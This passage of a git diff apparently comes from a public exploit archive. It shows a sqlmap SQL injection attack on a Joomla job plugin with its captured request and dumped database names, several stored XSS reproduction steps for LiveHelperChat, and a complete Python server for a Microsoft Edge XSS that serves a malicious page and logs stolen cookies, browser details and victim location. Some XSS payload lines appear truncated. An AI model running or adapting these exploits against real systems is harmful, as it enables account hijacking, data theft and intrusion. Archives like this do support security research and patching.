capture the "Apply Now" request (req.txt). + +HTTP Request: +``` +POST /index.php?option=com_jsjobs&task=jobapply.jobapplyajax HTTP/2 +Host: localhost:8080 +Cookie: joomla_user_state=logged_in; 67aa5f9b49e233456b916ea62ef1447b=kjou43pssdvaa5plr84dhc8P64 +Content-Length: 38 +Sec-Ch-Ua-Platform: "Linux" +Accept-Language: en-GB,en;q=0.9 +Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24" +Sec-Ch-Ua-Mobile: ?0 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://localhost:8080 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost:8080/index.php/component/jsjobs/newest-jobs?Itemid= +Accept-Encoding: gzip, deflate, br +Priority: u=1, i + +jobid=1&cvid=1&coverletterid=4&uid=460 +``` + +Exploit: +``` +sqlmap -r req.txt --dbs --batch -p cvid --dbms=mysql --threads=10 +        ___ +       __H__ + ___ ___[']_____ ___ ___  {1.9.1.2#dev} +|_ -| . [']     | .'| . | +|___|_  [']_|_|_|__,|  _| +      |_|V...       |_|   https://sqlmap.org + +--- +Parameter: cvid (POST) +Type: boolean-based blind +Title: Boolean-based blind - Parameter replace (original value) +Payload: jobid=1&cvid=(SELECT (CASE WHEN (7270=7270) THEN 1 ELSE (SELECT 6098 UNION SELECT 7386) END))&coverletterid=4&uid=460 + +Type: time-based blind +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +Payload: jobid=1&cvid=1 AND (SELECT 6497 FROM (SELECT(SLEEP(5)))EAyv)&coverletterid=4&uid=460 +--- + +available databases [2]: +[*] joomla_db +[*] information_schema +``` \ No newline at end of file diff --git a/exploits/php/webapps/52376.txt b/exploits/php/webapps/52376.txt new file mode 100644 index 000000000..26e3ba185 --- /dev/null +++ b/exploits/php/webapps/52376.txt @@ -0,0 +1,32 @@ +# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) +via Telegram Bot Username +# Date: 09/06/2025 +# Exploit Author: Manojkumar J (TheWhiteEvil) +# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/ +# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/ +# Software Link: +https://github.com/LiveHelperChat/livehelperchat/ +# Version: <=4.61 +# Patched Version: 4.61 +# Category: Web Application +# Tested on: Mac OS Sequoia 15.5, Firefox +# CVE : CVE-2025-51396 +# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51396 + +A stored cross-site scripting (XSS) vulnerability in Live Helper Chat +version ≤ 4.61 allows attackers to execute arbitrary JavaScript by +injecting a crafted payload into the Telegram Bot Username parameter. This +payload is stored and later executed when an admin or higher-privileged +user views or edits the Telegram Bot Username. + + +## Reproduction Steps: + +1. Log in as an operator user in Live Helper Chat. +2. Navigate to `Settings > Live Help Configuration > Telegram Bot`. +3. In the **Bot Username** field, enter the following payload: +``` + "> +``` +4. Save the settings. +5. Revisit the Telegram configuration panel and — the payload will execute. \ No newline at end of file diff --git a/exploits/php/webapps/52377.txt b/exploits/php/webapps/52377.txt new file mode 100644 index 000000000..a908e93c3 --- /dev/null +++ b/exploits/php/webapps/52377.txt @@ -0,0 +1,33 @@ +# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname +# Date: 09/06/2025 +# Exploit Author: Manojkumar J (TheWhiteEvil) +# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/ +# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/ +# Software Link: +https://github.com/LiveHelperChat/livehelperchat/ +# Version: <=4.61 +# Patched Version: 4.61 +# Category: Web Application +# Tested on: Mac OS Sequoia 15.5, Firefox +# CVE : CVE-2025-51397 +# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51397 + +A stored cross-site scripting (XSS) vulnerability in Live Helper Chat +version ≤ 4.61 allows attackers to execute arbitrary JavaScript by +injecting a crafted payload into the Operator Surname field. This payload +is stored and later executed when an admin or higher-privileged user views +the Recipients List where the attacker is listed as the Owner. + +## Reproduction Steps: + +1. Log in as an operator. +2. Navigate to your Operator Surname field. +3. Create new Operator Surname or Modify the Operator Surname, enter the +following payload: + ``` + "> + ``` +4. Save the changes. +5. This payload is stored and later executed when an admin or +higher-privileged user views the Recipients List where the attacker is +listed as the Owner. \ No newline at end of file diff --git a/exploits/php/webapps/52378.txt b/exploits/php/webapps/52378.txt new file mode 100644 index 000000000..cc62d7840 --- /dev/null +++ b/exploits/php/webapps/52378.txt @@ -0,0 +1,35 @@ +# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) +via Facebook Integration Page Name Field +# Date: 09/06/2025 +# Exploit Author: Manojkumar J (TheWhiteEvil) +# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/ +# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/ +# Software Link: +https://github.com/LiveHelperChat/livehelperchat/ +# Version: <=4.61 +# Patched Version: 4.61 +# Category: Web Application +# Tested on: Mac OS Sequoia 15.5, Firefox +# CVE : CVE-2025-51398 +# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51398 + +A stored cross-site scripting (XSS) vulnerability in Live Helper Chat +version ≤ 4.61 allows attackers to execute arbitrary JavaScript by +injecting a crafted payload into the Facebook page integration Name Field. +The payload is stored and executed when higher-privileged users (e.g., +administrators) access or edit the integration settings, resulting in +stored Cross Site Scripting (XSS). + +## Reproduction Steps: + +1. Log in as an operator. +2. Navigate to your Facebook page integration. +3. Create new Facebook page integration, enter the following payload in the +Facebook page integration Name Field: + ``` + "> + ``` +4. Save the changes. +5. The payload is stored and executed when higher-privileged users (e.g., +operator or administrators) access or edit the Facebook page integration, +resulting in stored Cross Site Scripting (XSS). \ No newline at end of file diff --git a/exploits/php/webapps/52379.txt b/exploits/php/webapps/52379.txt new file mode 100644 index 000000000..1f7147e60 --- /dev/null +++ b/exploits/php/webapps/52379.txt @@ -0,0 +1,32 @@ +# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) +via Personal Canned Messages +# Date: 09/06/2025 +# Exploit Author: Manojkumar J (TheWhiteEvil) +# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/ +# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/ +# Software Link: +https://github.com/LiveHelperChat/livehelperchat/ +# Version: <=4.61 +# Patched Version: 4.61 +# Category: Web Application +# Tested on: Mac OS Sequoia 15.5, Firefox +# CVE : CVE-2025-51400 +# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51400 + +A stored cross-site scripting (XSS) vulnerability in Live Helper Chat +version ≤ 4.61 allows attackers to execute arbitrary JavaScript by +injecting a crafted payload into the Personal Canned Messages. When an +admin or operator user views the message, and tries to send canned messages +the stored javascript executes in their browser context. + +## Reproduction Steps: + +1. Log in as an operator. +2. Navigate to your Personal Canned Messages. +3. Create new personal canned message, enter the following payload: + ``` + "> + ``` +4. Save the changes. +5. Try to use the personal canned message, the cross site scripting (xss) +will execute. \ No newline at end of file diff --git a/exploits/php/webapps/52380.txt b/exploits/php/webapps/52380.txt new file mode 100644 index 000000000..0f5272714 --- /dev/null +++ b/exploits/php/webapps/52380.txt @@ -0,0 +1,30 @@ +# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function +# Date: 09/06/2025 +# Exploit Author: Manojkumar J (TheWhiteEvil) +# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/ +# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/ +# Software Link: +https://github.com/LiveHelperChat/livehelperchat/ +# Version: <=4.61 +# Patched Version: 4.61 +# Category: Web Application +# Tested on: Mac OS Sequoia 15.5, Firefox +# CVE : CVE-2025-51401 +# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51401 + +A stored cross-site scripting (XSS) vulnerability in Live Helper Chat +version ≤ 4.61 allows attackers to execute arbitrary JavaScript by +injecting a crafted payload into the Operator Chat Name Field Triggers on +Chat Owner Transfer Functionality on Live Helper Chat. + +## Reproduction Steps: +1. Log in as an operator. +2. Navigate to your operator settings page. +3. In the **Name** field, enter the following payload: + ``` + "> + ``` +4. Save the changes. +5. Initiate a chat with a visitor. +6. Transfer the chat to another operator — the XSS payload executes in the +receiving operator’s chat interface. \ No newline at end of file diff --git a/exploits/php/webapps/52381.txt b/exploits/php/webapps/52381.txt new file mode 100644 index 000000000..9d8ffb8b6 --- /dev/null +++ b/exploits/php/webapps/52381.txt @@ -0,0 +1,34 @@ +# Exploit Title: LiveHelperChat <=4.61 - Stored Cross Site Scripting (XSS) +via Department Assignment Alias Nick Field +# Date: 09/06/2025 +# Exploit Author: Manojkumar J (TheWhiteEvil) +# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/ +# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/ +# Software Link: +https://github.com/LiveHelperChat/livehelperchat/ +# Version: <=4.61 +# Patched Version: 4.61 +# Category: Web Application +# Tested on: Mac OS Sequoia 15.5, Firefox +# CVE : CVE-2025-51403 +# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51403 +# Reference: +https://github.com/LiveHelperChat/livehelperchat/pull/2228/commits/2056503ad96e04467ec9af8d827109b9b9b46223 + +A low-privileged user/operator injects a malicious JavaScript payload into +the Department Assignment "Alias Nick" field while assigning or editing +department access. When a higher-privileged user (e.g., admin or operator) +edits the department assignment "Alias Nick" field, the stored script is +executed in their browser context. + +## Reproduction Steps: + +1. Log in as an operator. +2. Navigate to your Department Assignment settings page. +3. In the "Alias Nick" field, enter the following payload: + ``` + "> + ``` +4. Save the changes. +5. Revist the Department Assignment settings page and edit the Alias Nick +field, the cross site scripting (xss) will execute. \ No newline at end of file diff --git a/exploits/windows/remote/52372.txt b/exploits/windows/remote/52372.txt new file mode 100644 index 000000000..3abdbb165 --- /dev/null +++ b/exploits/windows/remote/52372.txt @@ -0,0 +1,235 @@ +# Titles: Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS) +# Author: nu11secur1ty +# Date: 2025-07-18 +# Vendor: Microsoft +# Software: Microsoft Edge Browser +# Reference: https://www.cve.org/CVERecord?id=CVE-2015-6176 + +#!/usr/bin/python +# nu11secur1ty CVE-2015-6176 + +import http.server +import socketserver +import socket +import threading +from urllib import parse +import requests +import datetime + +PORT = 8080 +COLLECTOR_PORT = 9000 + +# HTML page with extended XSS exploit that sends lots of info via Image GET +to collector +HTML_CONTENT = b\\\"\\\"\\\" + + + +XSS Edge Bypass PoC + + + +

XSS Edge Bypass PoC

+

If this alert appears, XSS is executed.

+ + +\\\"\\\"\\\" + +# Collector page with large sea picture and centered message (Unicode +allowed) +COLLECTOR_PAGE = \\\"\\\"\\\" + + + +Collected + + + +
Thank you for visiting the collector page
+ + +\\\"\\\"\\\" + +class ExploitHandler(http.server.SimpleHTTPRequestHandler): + def do_GET(self): + if self.path in (\\\'/\\\', \\\'/index.html\\\'): + content = HTML_CONTENT.replace(b\\\"{LOCAL_IP}\\\", +local_ip.encode()).replace(b\\\"{COLLECTOR_PORT}\\\", +str(COLLECTOR_PORT).encode()) + self.send_response(200) + self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\") + self.send_header(\\\"Content-Length\\\", str(len(content))) + self.end_headers() + self.wfile.write(content) + else: + self.send_error(404) + +class CollectorHandler(http.server.BaseHTTPRequestHandler): + def do_GET(self): + parsed_path = parse.urlparse(self.path) + if parsed_path.path == \\\"/collect\\\": + query = parse.parse_qs(parsed_path.query) + + cookie = query.get(\\\"cookie\\\", [\\\"\\\"])[0] + url = query.get(\\\"url\\\", [\\\"\\\"])[0] + referrer = query.get(\\\"referrer\\\", [\\\"\\\"])[0] + language = query.get(\\\"language\\\", [\\\"\\\"])[0] + platform = query.get(\\\"platform\\\", [\\\"\\\"])[0] + timezone = query.get(\\\"timezone\\\", [\\\"\\\"])[0] + screen = query.get(\\\"screen\\\", [\\\"\\\"])[0] + + ip = self.client_address[0] + user_agent = self.headers.get(\\\"User-Agent\\\", \\\"Unknown\\\") + timestamp = datetime.datetime.now().strftime(\\\"%Y-%m-%d +%H:%M:%S\\\") + + location = self.get_location(ip) + + if cookie: + print(f\\\"[{timestamp}] [+] Collected cookie: {cookie}\\\") + print(f\\\" URL: {url}\\\") + print(f\\\" Referrer: {referrer}\\\") + print(f\\\" Language: {language}\\\") + print(f\\\" Platform: {platform}\\\") + print(f\\\" Timezone: {timezone}\\\") + print(f\\\" Screen Resolution: {screen}\\\") + print(f\\\" From IP: {ip}\\\") + print(f\\\" User-Agent: {user_agent}\\\") + print(f\\\" Location: {location}\\\") + print(\\\"-\\\" * 50) + + # Save collected info to a file + with open(\\\"collected_data.log\\\", \\\"a\\\", encoding=\\\"utf-8\\\") as f: + f.write(f\\\"[{timestamp}] Cookie: {cookie}\\\\n\\\") + f.write(f\\\" URL: {url}\\\\n\\\") + f.write(f\\\" Referrer: {referrer}\\\\n\\\") + f.write(f\\\" Language: {language}\\\\n\\\") + f.write(f\\\" Platform: {platform}\\\\n\\\") + f.write(f\\\" Timezone: {timezone}\\\\n\\\") + f.write(f\\\" Screen Resolution: {screen}\\\\n\\\") + f.write(f\\\" IP: {ip}\\\\n\\\") + f.write(f\\\" User-Agent: {user_agent}\\\\n\\\") + f.write(f\\\" Location: {location}\\\\n\\\") + f.write(\\\"-\\\" * 50 + \\\"\\\\n\\\") + + self.send_response(200) + self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\") + content = COLLECTOR_PAGE.encode(\\\'utf-8\\\') + self.send_header(\\\"Content-Length\\\", str(len(content))) + self.end_headers() + self.wfile.write(content) + else: + self.send_error(404) + + def get_location(self, ip): + # Use free IP info service; fallback gracefully if no internet + try: + resp = requests.get(f\\\"https://ipinfo.io/{ip}/json\\\", timeout=3) + if resp.status_code == 200: + data = resp.json() + city = data.get(\\\"city\\\", \\\"\\\") + region = data.get(\\\"region\\\", \\\"\\\") + country = data.get(\\\"country\\\", \\\"\\\") + loc = data.get(\\\"loc\\\", \\\"\\\") + return f\\\"{city}, {region}, {country} (coords: {loc})\\\" + except Exception: + pass + return \\\"Location lookup failed or unavailable\\\" + +def get_local_ip(): + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + try: + s.connect((\\\"8.8.8.8\\\", 80)) + ip = s.getsockname()[0] + except Exception: + ip = \\\"127.0.0.1\\\" + finally: + s.close() + return ip + +def run_exploit_server(): + with socketserver.TCPServer((\\\"\\\", PORT), ExploitHandler) as httpd: + print(f\\\"[*] Exploit server running at: http:// +{local_ip}:{PORT}/index.html\\\") + httpd.serve_forever() + +def run_collector_server(): + with socketserver.TCPServer((\\\"\\\", COLLECTOR_PORT), CollectorHandler) as +httpd: + print(f\\\"[*] Collector server listening for stolen cookies at: +http://{local_ip}:{COLLECTOR_PORT}/collect\\\") + httpd.serve_forever() + +if __name__ == \\\"__main__\\\": + local_ip = get_local_ip() + try: + print(f\\\"[*] Your server IP is: {local_ip}\\\") + exploit_thread = threading.Thread(target=run_exploit_server, +daemon=True) + exploit_thread.start() + + run_collector_server() + except KeyboardInterrupt: + print(\\\"\\\\n[!] Shutting down servers. Goodbye!\\\") + +``` + +# Video: +[href](https://www.youtube.com/watch?v=T2YLrFsvXOc) + +# Source: +[href]( +https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176) + +# Buy me a coffee if you are not ashamed: +[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index eb3013844..7dbed2657 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11618,6 +11618,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 25205,exploits/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",remote,multiple,,2005-03-10,2013-05-13,1,,,,,,https://www.securityfocus.com/bid/12772/info 42753,exploits/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor Access",2017-05-19,"Simon Brannstrom",remote,multiple,,2017-09-19,2017-09-20,0,CVE-2017-12930;CVE-2017-12929,,,,, 51019,exploits/multiple/remote/51019.txt,"Teleport v10.1.1 - Remote Code Execution (RCE)",2022-09-23,"Brandon Roach",remote,multiple,,2022-09-23,2022-09-23,0,CVE-2022-36633,,,,, +52374,exploits/multiple/remote/52374.c,"Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow",2025-07-22,"Byte Reaper",remote,multiple,,2025-07-22,2025-07-22,0,CVE-2025-7795,,,,, 33499,exploits/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,remote,multiple,,2010-01-11,2014-05-26,1,CVE-2009-4491;OSVDB-61775,,,,,https://www.securityfocus.com/bid/37714/info 21276,exploits/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,remote,multiple,,2002-02-06,2012-09-12,1,CVE-2002-0266;OSVDB-4313,,,,,https://www.securityfocus.com/bid/4035/info 24224,exploits/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow",2004-06-04,"Nilanjan De",remote,multiple,,2004-06-04,2013-01-19,1,,,,,,https://www.securityfocus.com/bid/10581/info @@ -11928,6 +11929,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,webapps,multiple,80,2014-02-16,2014-02-16,1,OSVDB-103387,,,,, 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,,2018-07-11,2018-07-13,1,,Traversal,,http://www.exploit-db.com/screenshots/idlt45500/45007.png,, 33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,webapps,multiple,,2010-03-14,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38721/info +52375,exploits/multiple/webapps/52375.rb,"Discourse 3.1.1 - Unauthenticated Chat Message Access",2025-07-22,İbrahimsql,webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2023-45131,,,,, 52358,exploits/multiple/webapps/52358.py,"Discourse 3.2.x - Anonymous Cache Poisoning",2025-07-08,İbrahimsql,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-47773,,,,, 49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,,2021-04-08,2021-04-08,0,CVE-2021-30147,,,,, 48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,,2020-07-22,2020-07-22,0,CVE-2020-7680,,,,, @@ -12324,6 +12326,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,,2021-04-01,2021-04-01,0,,,,,, 49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,,2020-12-04,2020-12-04,0,,,,,, 46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,,2019-05-28,2019-05-28,0,,,,,, +52370,exploits/multiple/webapps/52370.py,"Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE",2025-07-22,"Md Amanat Ullah (xSwads)",webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2025-34077,,,,, 52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,, 35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,, 52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,, @@ -12402,6 +12405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,, 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,, 52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,, +52371,exploits/multiple/webapps/52371.py,"Simple File List WordPress Plugin 4.2.2 - File Upload to RCE",2025-07-22,"Md Amanat Ullah (xSwads)",webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2020-36847,,,,, 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,, 51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,, 52344,exploits/multiple/webapps/52344.py,"Sitecore 10.4 - Remote Code Execution (RCE)",2025-06-26,"Yesith Alvarez",webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2025-27218,,,,, @@ -20949,6 +20953,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,, 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,, 51645,exploits/php/webapps/51645.txt,"Joomla JLex Review 6.0.1 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,, +52373,exploits/php/webapps/52373.txt,"Joomla JS Jobs plugin 1.4.2 - SQL injection",2025-07-22,"Adam Wallwork",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-49484,,,,, 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,, 49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,, 51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,, @@ -23006,6 +23011,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42487,exploits/php/webapps/42487.txt,"LiveCRM 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,, 43860,exploits/php/webapps/43860.txt,"LiveCRM SaaS Cloud 1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5985,,,,, 34721,exploits/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Persistent Cross-Site Scripting",2014-09-20,"Brij Kishore Mishra",webapps,php,,2014-09-20,2014-09-20,0,CVE-2014-6420;OSVDB-111744,,,,, +52381,exploits/php/webapps/52381.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51403,,,,, +52378,exploits/php/webapps/52378.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51398,,,,, +52377,exploits/php/webapps/52377.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51397,,,,, +52379,exploits/php/webapps/52379.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51400,,,,, +52376,exploits/php/webapps/52376.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51396,,,,, +52380,exploits/php/webapps/52380.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51401,,,,, 42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,, 23749,exploits/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",webapps,php,,2004-02-23,2012-12-30,1,,,,,,https://www.securityfocus.com/bid/9727/info 42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,, @@ -44161,6 +44172,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4279,exploits/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution",2007-08-10,h07,remote,windows,,2007-08-09,,1,OSVDB-36399;CVE-2007-4336,,,,, 40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows,,2017-01-05,2018-05-18,0,CVE-2016-7200;CVE-2016-7201,"Client Side",,,,https://github.com/theori-io/chakra-2016-11 45502,exploits/windows/remote/45502.txt,"Microsoft Edge - Sandbox Escape",2018-09-27,"Google Security Research",remote,windows,,2018-09-27,2018-09-28,1,CVE-2018-8469;CVE-2018-8468;CVE-2018-8463,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&can=1&q=&sort=-modified%20-id&colspec=ID%20Status%20Owner%20Summary%20Modified&desc=5 +52372,exploits/windows/remote/52372.txt,"Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)",2025-07-22,nu11secur1ty,remote,windows,,2025-07-22,2025-07-22,0,CVE-2015-6176,,,,,https://www.cve.org/CVERecord?id=CVE-2015-6176 35573,exploits/windows/remote/35573.txt,"Microsoft Excel - Remote Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",remote,windows,,2011-04-12,2014-12-27,1,CVE-2011-0104;OSVDB-71761,,,,,https://www.securityfocus.com/bid/47245/info 28189,exploits/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,remote,windows,,2006-07-06,2013-09-17,1,CVE-2006-3431;OSVDB-27053,,,,,https://www.securityfocus.com/bid/18872/info 52343,exploits/windows/remote/52343.py,"Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)",2025-06-26,nu11secur1ty,remote,windows,,2025-06-26,2025-06-26,0,CVE-2025-47165,,,,,